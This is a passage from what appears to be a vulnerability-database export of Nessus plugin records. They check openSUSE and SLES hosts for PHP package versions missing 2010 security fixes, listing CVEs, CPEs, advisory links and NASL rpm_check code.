flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ctype-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-curl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dba-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dbase-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-dom-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-exif-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-fastcgi-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ftp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gd-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gettext-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-gmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-hash-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-iconv-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-json-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-ldap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mbstring-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mcrypt-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-mysql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-odbc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-openssl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pcntl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pdo-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pear-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pgsql-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-pspell-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-shmop-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-snmp-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-soap-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-suhosin-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvmsg-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvsem-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-sysvshm-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-tokenizer-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-wddx-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlreader-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlrpc-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xmlwriter-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-xsl-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zip-5.2.14-0.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"php5-zlib-5.2.14-0.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:24:10", "description": "PHP was updated to version 5.3.3 to fix serveral security issues.\n\n(CVE-2010-0397, CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-1866, CVE-2010-1914, CVE-2010-1915, CVE-2010-1917, CVE-2010-2093, CVE-2010-2094, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2225, CVE-2010-2531, CVE-2010-2950, CVE-2010-3062, CVE-2010-3063, CVE-2010-3064, CVE-2010-3065)", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zlib", "cpe:/o:novell:opensuse:11.3"], "id": "SUSE_11_3_APACHE2-MOD_PHP5-100812.NASL", "href": "https://www.tenable.com/plugins/nessus/75429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update apache2-mod_php5-2929.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75429);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\", \"CVE-2010-1866\", \"CVE-2010-1914\", \"CVE-2010-1915\", \"CVE-2010-1917\", \"CVE-2010-2093\", \"CVE-2010-2094\", \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\", \"CVE-2010-2531\", \"CVE-2010-2950\", \"CVE-2010-3062\", \"CVE-2010-3063\", \"CVE-2010-3064\", \"CVE-2010-3065\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)\");\n script_summary(english:\"Check for the apache2-mod_php5-2929 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to version 5.3.3 to fix serveral security issues.\n\n(CVE-2010-0397, CVE-2010-1860, CVE-2010-1862, CVE-2010-1864,\nCVE-2010-1866, CVE-2010-1914, CVE-2010-1915, CVE-2010-1917,\nCVE-2010-2093, CVE-2010-2094, CVE-2010-2097, CVE-2010-2100,\nCVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2225,\nCVE-2010-2531, CVE-2010-2950, CVE-2010-3062, CVE-2010-3063,\nCVE-2010-3064, CVE-2010-3065)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=588975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=604656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=605100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609763\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609766\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609768\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=609769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=612556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=616232\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=619489\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=633932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=633934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=636923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-09/msg00013.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_php5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"apache2-mod_php5-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-bcmath-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-bz2-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-calendar-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-ctype-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-curl-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-dba-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-devel-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-dom-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-enchant-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-exif-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-fastcgi-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-fileinfo-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-ftp-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-gd-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-gettext-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-gmp-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-hash-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-iconv-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-imap-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-intl-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-json-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-ldap-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-mbstring-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-mcrypt-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-mysql-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-odbc-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-openssl-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-pcntl-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-pdo-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-pear-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-pgsql-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-phar-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-posix-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-pspell-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-readline-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-shmop-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-snmp-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-soap-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-sockets-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-sqlite-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-suhosin-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-sysvmsg-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-sysvsem-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-sysvshm-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-tidy-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-tokenizer-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-wddx-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-xmlreader-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-xmlrpc-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-xmlwriter-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-xsl-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-zip-5.3.3-0.1.2\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"php5-zlib-5.3.3-0.1.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / php5 / php5-bcmath / php5-bz2 / php5-calendar / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:31:52", "description": "PHP was updated to version 5.3.3 to fix serveral security issues.\n\n(CVE-2010-0397, CVE-2010-1860, CVE-2010-1862, CVE-2010-1864, CVE-2010-1866, CVE-2010-1914, CVE-2010-1915, CVE-2010-1917, CVE-2010-2093, CVE-2010-2094, CVE-2010-2097, CVE-2010-2100, CVE-2010-2101, CVE-2010-2190, CVE-2010-2191, CVE-2010-2225, CVE-2010-2531, CVE-2010-2950, CVE-2010-3062, CVE-2010-3063, CVE-2010-3064, CVE-2010-3065)", "cvss3": {}, "published": "2010-09-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : apache2-mod_php5 (openSUSE-SU-2010:0599-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0397", "CVE-2010-1860", "CVE-2010-1862", "CVE-2010-1864", "CVE-2010-1866", "CVE-2010-1914", "CVE-2010-1915", "CVE-2010-1917", "CVE-2010-2093", "CVE-2010-2094", "CVE-2010-2097", "CVE-2010-2100", "CVE-2010-2101", "CVE-2010-2190", "CVE-2010-2191", "CVE-2010-2225", "CVE-2010-2531", "CVE-2010-2950", "CVE-2010-3062", "CVE-2010-3063", "CVE-2010-3064", "CVE-2010-3065"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-hash", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mcrypt", 